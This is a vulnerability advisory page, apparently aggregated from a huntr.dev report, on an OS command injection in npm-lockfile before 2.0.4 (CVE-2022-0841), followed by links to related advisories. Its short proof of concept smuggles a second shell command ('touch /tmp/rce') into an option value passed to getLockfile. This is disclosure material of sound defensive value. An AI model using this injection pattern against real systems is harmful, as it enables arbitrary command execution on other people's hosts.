Lucene search
Xiaofen94F806DC9-2ECD-4E79-997E-5292F1BEA9F1HistoryFeb 28, 2022 - 7:32 p.m.
OS Command Injection
2022-02-2819:32:22
xiaofen9
www.huntr.dev
6
0.003 Low
EPSS
Percentile
69.8%
Description
npm-lockfile before 2.0.4 does not santize unsafe external input and invoke sensitive command execution API with the input, causing command injection vulnerability.
Proof of Concept
// npm i [email protected]
const getLockfile = require('npm-lockfile/getLockfile');
getLockfile("./package-lock.json", "08/01/2022",{"only":"prod|touch /tmp/rce"}) // a file named rce will be created at /tmp
Impact
This vulnerability is capable of executing arbitrary command on the hosting operating system.
Related
osv
osv
CVE-2022-0841
2022-03-03 16:15:07
OS Command injection in npm-lockfile
2022-03-04 00:00:18
redhatcve
redhatcve
CVE-2022-0841
2022-03-04 00:19:23
prion
prion
Command injection
2022-03-03 16:15:00
cve
cve
CVE-2022-0841
2022-03-03 16:15:07
cvelist
cvelist
CVE-2022-0841 OS Command Injection in ljharb/npm-lockfile
2022-03-03 15:50:10
nvd
nvd
CVE-2022-0841
2022-03-03 16:15:07
github
github
OS Command injection in npm-lockfile
2022-03-04 00:00:18
veracode
veracode
OS Command Injection
2022-03-04 05:14:17